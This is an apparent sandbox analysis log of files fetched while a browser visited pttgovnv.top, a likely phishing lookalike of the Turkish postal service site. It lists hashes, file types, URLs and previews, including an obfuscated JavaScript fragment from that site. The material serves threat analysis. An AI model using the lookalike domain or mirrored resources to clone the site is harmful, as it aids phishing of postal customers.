          Preview:RIFF....WEBPVP8X...........N..ALPHj........9......I..m[...m.v...m...R+.*..s.<q.c^.z.............z.....:i)m.n).e.{..p.Y.,C.y..N...;..s.i.o.YF.....|......>.S....../.....p>lm..g.\.B.......n...n3.7......XL...*9...68...7.<v...Z..!....S.c.!K.....\....c....,..Ra..80.1...$....+...|.h...a.....c..#.e.~...F=.-.9AM..Z.[..S|...BVk.O...b...w.~...R.$. }6.k.L..r..qT.\.Pj.\}.....Y.@.@Tk..=..a....A.M.p.%......Z.Vxf.Lz.....!D.~........5.h.H1."0%.*7.[k......N5..WO...s.!I...0'.....K1fR.g..`......I!f.....;|1.x....N.O..p....u.....B..b.._>jq.9..6.O.p..t..8.,x..Q.!K.1H./.=..m.S..3a'I..R..}<v2.,r...b....._n[o.x...t+n...&.@z{[`H.[../...$..$.?|Vp.^.r%%...D.`...k.4.;.L....BRk.Q.....:UO!W.z.;)2...=.{..G....._...S.t.J.l}~......&).R.Z.7...6`.......x..........{V.o...v..S..Y.K.T.5.2.]0..1.e..........q...F.')d..,.8....M...R....T{.........L?~..o........-....._./.."E.....b4....~...Z.Wm......k......9....>z..S..p.=....`iu..;.W)..)Ho.....pT5..r....U....'|...#...O.O
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:SVG Scalable Vector Graphics image
          Category:dropped
          Size (bytes):1878
          Entropy (8bit):5.099221191787203
          Encrypted:false
          SSDEEP:24:t4LE1XD/D1rHxmS2CHGFCt0u9cLp/NW5Aj5AfCJCDh2GhbIL82Nsd8xbpTGPjehh:+6XjlHoS2CmYoXWNbAx5p0KyD0l
          MD5:B441F960B07A4EC1688F2EDB043F767A
          SHA1:848D59D73CC5324CD222CE97D6FFD48FF7D8021F
          SHA-256:9160F6D5855A884D542A3DE24B58E892616D74CFA9BDD9816C209350003EB71D
          SHA-512:133D9616277EF27F0430DCB5E7D1D5C2023D2BBE8AB06B286B2F8B395B85DE2B6E330779F6906672860C660000C080E46D0F7F1CAB8CD5E036415708F1C06607
          Malicious:false
          Reputation:low
          Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="54" height="54" viewBox="0 0 54 54">.. <defs>.. <filter id="Ellipse_369" x="0" y="0" width="54" height="54" filterUnits="userSpaceOnUse">.. <feOffset dy="3" input="SourceAlpha"/>.. <feGaussianBlur stdDeviation="3" result="blur"/>.. <feFlood flood-color="#2c2828" flood-opacity="0.259"/>.. <feComposite operator="in" in2="blur"/>.. <feComposite in="SourceGraphic"/>.. </filter>.. <clipPath id="clip-path">.. <rect width="8" height="14" fill="none"/>.. </clipPath>.. </defs>.. <g id="Group_11280" data-name="Group 11280" transform="translate(604 -1140) rotate(90)">.. <g id="Group_140" data-name="Group 140" transform="translate(1146 559)">.. <g transform="matrix(0, -1, 1, 0, -6, 45)" filter="url(#Ellipse_369)">.. <g id="Ellipse_369-2" data-name="Ellipse 369" transform="translate(45 6) rotate(90)" fill="#fff" stroke="rgba(136,152,170,0.5)" stroke-w
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:downloaded
          Size (bytes):16498
          Entropy (8bit):7.8582701910541655
          Encrypted:false
          SSDEEP:384:9ogvnYzo4hpswgtGt8n9o4KsbPHRT8DGCkj21VEwU:DnSxrsLtGt54trHx8D3U
          MD5:9A038EA93F4919E25D2064BA48874586
          SHA1:4996E14DCB1BA05CD29D19C45DFAABA45AA3BCC2
          SHA-256:49FE57608D794F7B7F923847B653CCEC67C5C2083906CB5780ECD7B8F22BFD16
          SHA-512:6A9918EA7AE0DEDBAA1E9D0FC7D41274FEE90C9D29A5254D4F33C4BF87827425CA0B4CDAB76C62AE79A9AB4CB28AA9857E4F4A72CD5612DA45565630CA3AE5E1
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/layout/images/39.png
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..?.IDATx.......]..G..e#{W...N.vDR!..]a...cG!.]*G4.|..;"..~\..@...4.;..:N."......A.;'...#..r.G..4..1.8...'..v.%...{...........g...:.....~>.....c...P,7q.....q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q....8........@.....!.........B.....q....8........@.... ..........B....!.....8........@.... ..........B....!.....8.........q... .........@.....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q... .........@.....!.........B.....q....8........@.... ..........B.....q....8........@.... ....<2_.^......q(.=.lt./u/.U8....X....p.`.......k.{-k..4.P>.Q.r...C..G.My.u..|.3..!.........u...^M/.mqt&2.I..|....jK..^...^Hj.p\.......+....6..5.6g;@..t.9..........P7...lz5.....y..".x.%. ..qo..).lw)f0.Pc...0.!.dz.!3c.......w..q...l.....l..C.....n%.&$.......q
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (3653)
          Category:dropped
          Size (bytes):3701
          Entropy (8bit):5.228131891228675
          Encrypted:false
          SSDEEP:48:kNfY1SNf36JTAgtUNflBI3EkKHWRufQWTWDKDWDggZj2rZlVgZ1t:Ou8v6JT7+jCKHfqXnNJ
          MD5:239EE53CB3C3C49D0E1B9D0D23E5DA52
          SHA1:AA127BC5FD2B93B3ACA49EC673C37881094F9629
          SHA-256:C05E73D2B9E70CF33428CAF11087915B75F82B2F4342048EE54B823EB2A99431
          SHA-512:E0493B3844DA9B8D97837FF39218CF76F83296A6271D3B66FC1DDEBB0B5528AF37EFA0E57ADAB09246C908C0FEA0B39F74D508E6261E1B17829BAB7562FAB6B8
          Malicious:false
          Reputation:low
          Preview:.styles_container__uvZ2S{position:fixed;top:0;right:0;left:0;bottom:0;background-color:rgba(0,0,0,.8);-webkit-backdrop-filter:blur(5px);-moz-backdrop-filter:blur(5px);-o-backdrop-filter:blur(5px);backdrop-filter:blur(5px);z-index:5;overflow-y:auto}.styles_container__uvZ2S>i{position:absolute;top:1.5rem;right:2rem;color:#fff;font-size:1.5rem!important}.styles_container__uvZ2S>.styles_body__Y9gTP{margin-top:4.5rem;padding:0 2rem}.styles_container__sX9Do{position:fixed;top:0;right:0;left:0;bottom:0;background-color:rgba(0,0,0,.8);-webkit-backdrop-filter:blur(5px);-moz-backdrop-filter:blur(5px);-o-backdrop-filter:blur(5px);backdrop-filter:blur(5px);z-index:5;overflow-y:auto}.styles_container__sX9Do>.styles_inputField__2P_Kd{position:relative;margin:4rem 1rem 1rem;padding:1rem}.styles_container__sX9Do>.styles_inputField__2P_Kd>input[type=text]{background-color:#eee;width:100%;height:3rem;padding:0 9rem 0 1rem;border:none;border-radius:2rem}.styles_container__sX9Do>.styles_inputField__2P_Kd>
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:downloaded
          Size (bytes):21895
          Entropy (8bit):7.839028487142548
          Encrypted:false
          SSDEEP:384:jPqsTPPq3PPqFPPqa/743sZpR/J3xMIqn3BU54X0q6+I9jstD/zS/VN/bAqkpAko:jPqsTPPq3PPqFPPqaD43sZD/Na53B8Ca
          MD5:2521C5CB66A4D396A16637DC0B4AC309
          SHA1:B96042B472F4C9386F739A69E52CA5D68DE760D7
          SHA-256:BB65C7B6550153A9CE4BB0D9B5EF308F500CF188F465F68DE7B83D1A0E7B55DA
          SHA-512:92D6FB984323E46AB0157F445187A6B14413D32408562B362C809C7770AF301F5F77A39FA9466C0B1D5B55BE9DADE5231402D6A0128398A650F406CB0CE46329
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/layout/images/52.png
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..U.IDATx..O.#I...3.....^..".E..B.....U....rK...Reo.v.-.\......$.w7.a.X.k..H....k..w3.V,@.O.......v.N..#.......'~q...|......`..."....@......"......q.....8....@......"............8....@..... .............8....@..... .............8....D..... ..................D..... ......q...........D..... ......q...........D....."......q..........@......"......q.....8....@......"......q.....8....@......"............8....@..... .............8....D..... .............8....D..... ..................D..... ......q...........D..... ......q...........D....."......q..........@......"......q.....8....@......"......q.....8....@......"............8....@..... .............8....D..... .............8....D..... ..................D..... ......q...........D....."......q...........D....."......q..........@......"......q.....8....@......"......q.....8....@......"............8....@.....7~...>.........t!..@......0^...,.\B
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:OpenType font data
          Category:downloaded
          Size (bytes):111508
          Entropy (8bit):6.108051472779374
          Encrypted:false
          SSDEEP:3072:Xfz/i5rBzzrvJSpJzXE8wNNNsf6cNVP28btzbgEL2oPLT:Xbq/DobE8wNNNsf6cNVJt/go2ov
          MD5:2616E1C355C564A4E67F09308EF7FF89
          SHA1:D8E956ABB65E24A5A1CFD91FFC08EC7C2E4431E0
          SHA-256:EF052A516F72DF61400E58519B9D52DB19C8C67D11849CDD6058C3A77FE2A0B4
          SHA-512:07475E92594F16BDFBBFE75E54284B192445447BD31F61AA6B669CC5F60F1D793F6F0D011124834B6DBAD4A425BE93CCB27D6438717D2B767990545FF3A393F4
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/_next/static/media/OmnesRegular.2b095194.otf
          Preview:OTTO.......PCFF .@u.........DSIG............GDEF...........:GPOS..cZ.......GSUB._W...}...%>OS/2c{k....d...`cmap...H........head..?........6hhea.`.........$hmtxh.F........dmaxp.YP.........nameX;9i.......Ppost...F...`... ...........d_.<............_.........A.!.f.................%...........j.............j...........o.........U.v...................................................................................*.........1.F...........w.......................X...........b...........p.......................4...........R...........l.....................8...........8...........b.............r...........|...................................................................................&...........@...........Z...........tCopyright (c) 2017 by Joshua Darden, Inc. All rights reserved..Omnes is a trademark of Joshua Darden, Inc.OmnesRegularDardenStudio: Omnes Regular: 2018:<TkD-7986-719bfb96dbbb179f646c3d784fe546634ce034ba>Omnes RegularVersion 001.004Omnes-RegularDarden StudioJoshua Dardenhttp
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 1772 x 945, 8-bit/color RGBA, non-interlaced
          Category:downloaded
          Size (bytes):29339
          Entropy (8bit):7.356325846196763
          Encrypted:false
          SSDEEP:384:L/VTX6DKxDUWnEooJ+NMvlF+Dir+WEtOaUfw4LBQbbr3NwPHpK7AGW3T6CmPDwD:L/kDCJ1y7UU+WwDUfkbLOpGnPUD
          MD5:AEBDDA95DC8CFFFEE118C2F7CDF158DC
          SHA1:FD547F5F7DE14D0F8E234B6AAF21CE10C81976A1
          SHA-256:CDABE7A61B3729FECD8DDFC82EB2BEAF3EE622FCD58B1774E39926DADA88880B
          SHA-512:39AE9C324315EC8DBE3A080909E6AB8EF7019D0C36AEF4F418DC9905839BB684AD5A5A1A05C8BE820165522EBB07D7FF8C6CF8326FA8905DC1620B92947313DE
          Malicious:false
          Reputation:low
          URL:https://pttem.alo-tech.com/storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true
          Preview:.PNG........IHDR.....................pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..r(IDATx...Mv.G....w.9d.(+..z......8+.Y...0+@.=..1.4.."V...}..KA8...+u.u.S.......j....7..+.................P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Web Open Font Format (Version 2), TrueType, length 16692, version 1.0
          Category:downloaded
          Size (bytes):16692
          Entropy (8bit):7.987238779938359
          Encrypted:false
          SSDEEP:384:JJlRJsN3EMLFZ1UNJ1rDtEZftwezFOAO54hzpr:JJzuN3nK13te+ezFON2N
          MD5:D65113B6DA7BA4BD0A59DBDA5A7E24D4
          SHA1:929ECF3AD6AB03123A7BAD0609B4B8BA1623D4E8
          SHA-256:CCE577471C2586F3E0C2518FFF84A970D33F61491FB8C629341B86F238CF07C0
          SHA-512:70E39E0EA11ED0C9C6B75CB8240760EB681CC53570146246918A222489A41C85BE898557CF1E5805A87C5155EE01F8B1E5EC480A1FABD742E44A30381C44E8FD
          Malicious:false
          Reputation:low
          URL:https://fonts.gstatic.com/s/opensans/v28/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4gaVI.woff2
          Preview:wOF2......A4......{...@..........................b. ..P.`?STAT^.....|...........z.....6.$..8. ..x. .....k..6........6..6.`.<4.... e.l..).8'(.I....B...u..RW$...fF....q.j...K....6.<...>zS..k...F.;f.G..=.Y.KP.(.....3K.w.#.3'[n..(..4....#..cv.....s0......<.....9.y.J...v%.....lS..sF......@...VT.+P.........#gm.......H..FH3..~..h...tB..l.c.;...6D.Z#uB..........x_.n.h%?..I.......e........(..*....E[%C.:.....h.... .]]d...Y.d...~.N.N`x......a.I.#$%.t..lr....L..E..............7.op.1..SM...${g..V~.S?.+.?...*1`...TP.@..-^8.4..Z}_I*\.N.......>%...-.0.>...T...b.d.#..H^.C.....u..v..g..3.%.KHB ...... )..}G.. u).!g...)Q.H....+UNU*.wn]......sHE..w..y..{'5.j\U...3...=...,.0....bAS.=^..WCw.:.J....g..wZ... .\F"(u..s.Ze:.....;B[...P.:Ek...BWp<.0.R..5...5..............S'.t..6....q..~...SlY/.;.!e.z.-......9\&M.\.m..R....(F...B.m..N.r5.[2...E.z..m{...u......BoQ...d.CG7.|.Z.5B*.`..%uM....).d.=.4..S.........R.,..y4.....E...Z.6.&..f..*.x..^.f6.S.0.lG4Lw..?..n.......f....AL
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:JSON data
          Category:downloaded
          Size (bytes):41
          Entropy (8bit):4.180365114215879
          Encrypted:false
          SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
          MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
          SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
          SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
          SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6libQf&sid=QB7JMh6ogzHtMo_gBQUs
          Preview:{"code":1,"message":"Session ID unknown"}
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):41
          Entropy (8bit):4.180365114215879
          Encrypted:false
          SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
          MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
          SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
          SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
          SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
          Malicious:false
          Reputation:low
          Preview:{"code":1,"message":"Session ID unknown"}
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (11524)
          Category:downloaded
          Size (bytes):11574
          Entropy (8bit):5.332302381529318
          Encrypted:false
          SSDEEP:96:7v+CNp6/anNwCPXjBobJHnycoYIWx6T334MjbxN5AZOva/rL6twJwg1uvbqXGA6g:7rfManGCPXjSJmxg09bxHAYvun3DX20j
          MD5:DAC5D6A1FCFC7602CA1135B80C4AEAC7
          SHA1:85A3FB6333CF317B57F44A327BE09E31590D5912
          SHA-256:E1B2B0D74DCF5FA0839F03D26D57EA6CF629004C0707755B8B70E51EEC14AD23
          SHA-512:C3EBA50A7AD6212686D13A581FF58B68B915280234445293D2A085AC6C0480861065517AAF290CF46EF81BF8ABE255D2FE9009EF23BDA33894A8692E1284EBE9
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/_next/static/chunks/4412-8214ad20a138381f.js
          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4412],{8953:function(e,t,n){"use strict";var r=n(8565),a=n.n(r),s=n(3288),u=n(2267),c=n.n(u),o=n(2466),i=n(6731),l=n.n(i),f=n(3395),p=n(3230),v=n(8082),h=n(2493),d=n.n(h),y=n(1295),_=n(427),m=n(1270),w=n(1395);function g(e,t){(null==t||t>e.length)&&(t=e.length);for(var n=0,r=new Array(t);n<t;n++)r[n]=e[n];return r}function x(e,t,n,r,a,s,u){try{var c=e[s](u),o=c.value}catch(i){return void n(i)}c.done?t(o):Promise.resolve(o).then(r,a)}function T(e){return function(){var t=this,n=arguments;return new Promise((function(r,a){var s=e.apply(t,n);function u(e){x(s,r,a,u,c,"next",e)}function c(e){x(s,r,a,u,c,"throw",e)}u(void 0)}))}}function b(e,t){return function(e){if(Array.isArray(e))return e}(e)||function(e,t){var n=null==e?null:"undefined"!==typeof Symbol&&e[Symbol.iterator]||e["@@iterator"];if(null!=n){var r,a,s=[],u=!0,c=!1;try{for(n=n.call(e);!(u=(r=n.next()).done)&&(s.push(r.value),!t||s.length!==t);u=!0);}catch(o){c=!0,a=o}final
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 1772 x 945, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):29339
          Entropy (8bit):7.356325846196763
          Encrypted:false
          SSDEEP:384:L/VTX6DKxDUWnEooJ+NMvlF+Dir+WEtOaUfw4LBQbbr3NwPHpK7AGW3T6CmPDwD:L/kDCJ1y7UU+WwDUfkbLOpGnPUD
          MD5:AEBDDA95DC8CFFFEE118C2F7CDF158DC
          SHA1:FD547F5F7DE14D0F8E234B6AAF21CE10C81976A1
          SHA-256:CDABE7A61B3729FECD8DDFC82EB2BEAF3EE622FCD58B1774E39926DADA88880B
          SHA-512:39AE9C324315EC8DBE3A080909E6AB8EF7019D0C36AEF4F418DC9905839BB684AD5A5A1A05C8BE820165522EBB07D7FF8C6CF8326FA8905DC1620B92947313DE
          Malicious:false
          Reputation:low
          Preview:.PNG........IHDR.....................pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..r(IDATx...Mv.G....w.9d.(+..z......8+.Y...0+@.=..1.4.."V...}..KA8...+u.u.S.......j....7..+.................P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 590 x 351, 8-bit/color RGBA, non-interlaced
          Category:downloaded
          Size (bytes):15215
          Entropy (8bit):7.966328191753387
          Encrypted:false
          SSDEEP:384:4v9zK76/9r8Q4rAhRsxAb/g55HmmcTI3368oiRw:4vI2ltko4sO5Hmziw
          MD5:7BB31B9EF5F35D816F9BC7A816C800D7
          SHA1:4F0351D0E82074BB2E94CD3F1A4CD96E3A7EDA0F
          SHA-256:4717A50BEB793AAE083B0FCA163B549706F873650D1F45812A364AF74084D804
          SHA-512:6B5B77217257C4EB9185949EB6BC87A1794E5126A047E78B4DF08757AD976E312EC66497251DEE2E31860E40925EC740A5D29605683B4AB4CFDA80261C12E7E4
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/favicon.ico
          Preview:.PNG........IHDR...N..._......;CV....sRGB.........gAMA......a.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<...!tEXtCreation Time.2018:09:07 09:16:06D/iU..:.IDATx^...vT.....a.8W...h...|..'Y0.|.......W`y.V&.W...$C5.y...x..}.]U-..?}.W..~..7/.....]...O-_..Y...0..L.K...".....C....Y.rn^.i+....9.~.p.y~k.h....R?...L.......Q"8..X>.=.Z.M~o.yS.b[.....C...T.\.Pz.~...7La~^...g~..ex..0"T..+H..V..p..c~...].b.......Av....py.-.)...../..2Fp.. c..6.......i.........%.....>(......(.........%....^......P.....P.....\h../........u@........N..C*Q.....!...Ex......P..r.......BO.\k3.e1'H.@..N@.2.....5...0F..l.*.Y.b......Ap.j...T..J). L....N@.....*~....)e..9*.b.~W.....[.'..u.;..@..:.B... 8.-X..}`?L_..(.@...n....[.......k 8.-.Y.k......J.`...e?.8...hI_..}9nJW6D..@...'.Ur.p..y...<.*.cFp.Z.t.x.>..`.9.X0..@n.N@......Q6@16.@..N@G.:.%G.!].r.Y.......t..>.........0.)V.0..A^...N......X.3.b.z.....M.9S...........O.9U).} 8.=!<.../c..J.h......i...{.....9A.@].'.g.......Ep..@x..A
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (32023)
          Category:downloaded
          Size (bytes):83612
          Entropy (8bit):5.277084099045577
          Encrypted:false
          SSDEEP:1536:knWi6p4BmVLFijGb2gXke71t5tgPBHlxNLIJBanUEwf7rmvsMn3lhMr:0UL5uxNL/4Cr3lOr
          MD5:0A6E846B954E345951E710CD6CE3440E
          SHA1:FBF9C77D0C4E3C34A485980C1E5316B6212160C8
          SHA-256:B13CB5989E08FCB02314209D101E1102F3D299109BDC253B62AA1DA21C9E38BA
          SHA-512:14653AADEB13635FF6F108137200DE430033050660B6F33B36DD15E92C10D1042FABCC8D08836374769AA8B2FE080DCDF038B8145D803F40167F54D8825AA321
          Malicious:false
          Reputation:low
          URL:https://chatserver.alo-tech.com/static/assets/js/jquery-2.0.3.min.js
          Preview:/*! jQuery v2.0.3 | (c) 2005, 2013 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery-2.0.3.min.map.*/.(function(e,undefined){var t,n,r=typeof undefined,i=e.location,o=e.document,s=o.documentElement,a=e.jQuery,u=e.$,l={},c=[],p="2.0.3",f=c.concat,h=c.push,d=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,x=function(e,n){return new x.fn.init(e,n,t)},b=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^-ms-/,N=/-([\da-z])/gi,E=function(e,t){return t.toUpperCase()},S=function(){o.removeEventListener("DOMContentLoaded",S,!1),e.removeEventListener("load",S,!1),x.ready()};x.fn=x.prototype={jquery:p,constructor:x,init:function(e,t,n){var r,i;if(!e)return this;if("string"==typeof e){if(r="<"===e.charAt(0)&&">"===e.charAt(e.length-1)&&e.length>=3?[null,e,null]:T.exec(e),!r||!r[1]&&t)return!t||t.jquery?(t||n).find(e):this.constructor(t).find(e);if(r[1]){if(t=t instanceof x?t[0]:t,x.me
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Unicode text, UTF-8 text, with very long lines (4005)
          Category:dropped
          Size (bytes):4436
          Entropy (8bit):5.598657081005046
          Encrypted:false
          SSDEEP:96:n/EKhN5jG91m+Lu1ur64EJD0l3cyvp9n1iI+ZM67IB+RvUCFa:/EKhK91mkUX4EJD8r9nUL7IB+RcQa
          MD5:D940AFE8635CC3409F9E3AE7EA0518CD
          SHA1:4DF3E545964A46C46A204E2B072C7FCF4BC2FA7B
          SHA-256:49D6396A823560D47584B60E9A88A2374F87A02626F8ED2DBCFAC29885651197
          SHA-512:B21A7807DB9FACD47DF2A2629E15EB127022F0107FC651C13578505E5737BB64D1F2D8C85135730879EC739838049AFEB42DD21CFB13B8A27FEE4AF5F137B79B
          Malicious:false
          Reputation:low
          Preview:var acjsLanguagesList={"af":"Afrikaans","sq":"Albanian - shqip","am":"Amharic - ....","ar":"Arabic - .......","an":"Aragonese - aragon.s","hy":"Armenian - .......","ast":"Asturian - asturianu","az":"Azerbaijani - az.rbaycan dili","eu":"Basque - euskara","be":"Belarusian - ..........","bn":"Bengali - .....","bs":"Bosnian - bosanski","br":"Breton - brezhoneg","bg":"Bulgarian - .........","ca":"Catalan - catal.","ckb":"Central Kurdish - ..... (........ ......)","zh":"Chinese - ..","zh-HK":"Chinese (Hong Kong) - ......","zh-CN":"Chinese (Simplified) - ......","zh-TW":"Chinese (Traditional) - ......","co":"Corsican","hr":"Croatian - hrvatski","cs":"Czech - .e.tina","da":"Danish - dansk","nl":"Dutch - Nederlands","en":"English","en-AU":"English (Australia)","en-CA":"English (Canada)","en-IN":"English (India)","en-NZ":"English (New Zealand)","en-ZA":"English (South Africa)","en-G
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Unicode text, UTF-8 text, with very long lines (6082), with no line terminators
          Category:dropped
          Size (bytes):6098
          Entropy (8bit):5.345197330361691
          Encrypted:false
          SSDEEP:96:XLD0GPxeMvMx+DCykuvej08WkE0EPO9n4gyk8gsubpme1C8Ed0UOa3NeS9eJSrBF:v0qeMkx+DCIveU8So4gyk8gsubpme1CT
          MD5:0DA448566DB5D334688029F4D8DA8025
          SHA1:9AE1FA7FEE699B2E08651E38850F4B73002191F2
          SHA-256:B532E6762E739AB6A28B435316707D8D90BC1CFCF1BBF430127481320C64B2ED
          SHA-512:9A29CB97F174931A186F465013B04939D63E18727D31235338976365E4C35588F98EEB50ADE4B087FD90D7B79D41514D3596D9C5446760A20773CCFF26663530
          Malicious:false
          Reputation:low
          Preview:const a26_0x2f6b2e=a26_0x2195;(function(_0x4b26d5,_0x58f703){const _0x55ba02=a26_0x2195,_0x56ed15=_0x4b26d5();while(!![]){try{const _0x1c2f33=-parseInt(_0x55ba02(0x163))/0x1+-parseInt(_0x55ba02(0x19a))/0x2*(parseInt(_0x55ba02(0x160))/0x3)+parseInt(_0x55ba02(0x17c))/0x4*(-parseInt(_0x55ba02(0x172))/0x5)+parseInt(_0x55ba02(0x186))/0x6+-parseInt(_0x55ba02(0x185))/0x7+-parseInt(_0x55ba02(0x173))/0x8+parseInt(_0x55ba02(0x15f))/0x9;if(_0x1c2f33===_0x58f703)break;else _0x56ed15['push'](_0x56ed15['shift']());}catch(_0x3aa38c){_0x56ed15['push'](_0x56ed15['shift']());}}}(a26_0x2d8e,0xe16ee));const a26_0x523979=(function(){let _0x1acf99=!![];return function(_0x2d3219,_0x2027c3){const _0x24a505=_0x1acf99?function(){const _0x248cf8=a26_0x2195;if(_0x2027c3){const _0x626e42=_0x2027c3[_0x248cf8(0x18e)](_0x2d3219,arguments);return _0x2027c3=null,_0x626e42;}}:function(){};return _0x1acf99=![],_0x24a505;};}()),a26_0x5b0a0d=a26_0x523979(this,function(){const _0x177b71=a26_0x2195;return a26_0x5b0a0d[_0x177
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (8208), with no line terminators
          Category:downloaded
          Size (bytes):8208
          Entropy (8bit):5.040666810574652
          Encrypted:false
          SSDEEP:192:N/e907s+dS77xXtpCl9v8p4sLsm5id6gxPv:N/e907YX9plgJv
          MD5:5CE4490B2A7A53FEFAAA7CA6A3C0E6E8
          SHA1:EDDFC8477C435553FA99A4898D2A1616326386F6
          SHA-256:D37FFD17A86FD0FAB657A4E14A4698C1C23EF681345F68FFC5D33AA6C5825443
          SHA-512:138926F500E214208279E744A2E325745FF8FD6F96472B9847954474BFA0BE0CBCED8852C2B55E62365825136466F79A976FABC9D84B9FF439E3E4A289CD532B
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/_next/static/JxrWbfN16VK5LXe_vQYf2/_buildManifest.js
          Preview:self.__BUILD_MANIFEST=function(e,i,a,s,t,r,c,n,d,u,o,g,p,l,m,h,k,b,f,j,y,F,P,_,I){return{__rewrites:{beforeFiles:[],afterFiles:[],fallback:[]},"/":[i,a,s,t,r,"static/css/2425cba10de1645b.css","static/chunks/pages/index-dfb7e1261ea0e06f.js"],"/_error":["static/chunks/pages/_error-32d9baaae5c99c79.js"],"/anket":[c,"static/chunks/pages/anket-2610e69587780097.js"],"/anket/[slug]":[c,"static/chunks/pages/anket/[slug]-1b52832c21c28bd1.js"],"/doviz-kurlari":["static/css/e341381de31b7a3e.css","static/chunks/pages/doviz-kurlari-c5ba2bb9e7f07c80.js"],"/duyurular":[s,"static/css/3cbd8bcfbd63f115.css","static/chunks/pages/duyurular-8d6cda8f6e9d3111.js"],"/duyurular/[slug]":["static/css/6fd0127afe4f9150.css","static/chunks/pages/duyurular/[slug]-1f9ac4bc183a7385.js"],"/galeri":[i,a,n,"static/chunks/pages/galeri-e8845bfe84a8e178.js"],"/galeri/[slug]":[i,a,n,"static/chunks/pages/galeri/[slug]-7fb28712356cc23b.js"],"/gonderi-ucreti-hesaplama":[e,d,u,o,g,p,l,m,h,k,b,f,j,y,F,P,_,I,"static/chunks/pages/g
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:RIFF (little-endian) data, Web/P image
          Category:downloaded
          Size (bytes):11518
          Entropy (8bit):7.966291743818182
          Encrypted:false
          SSDEEP:192:+WG04lslf+6LDQ0v2M635Hz0xvFzzahp0y4BTHzWnMDfjVO/IwlQmn3C3WbQ1R:+Ef+I0i2T1zgzaXXWCqsQmny3WbO
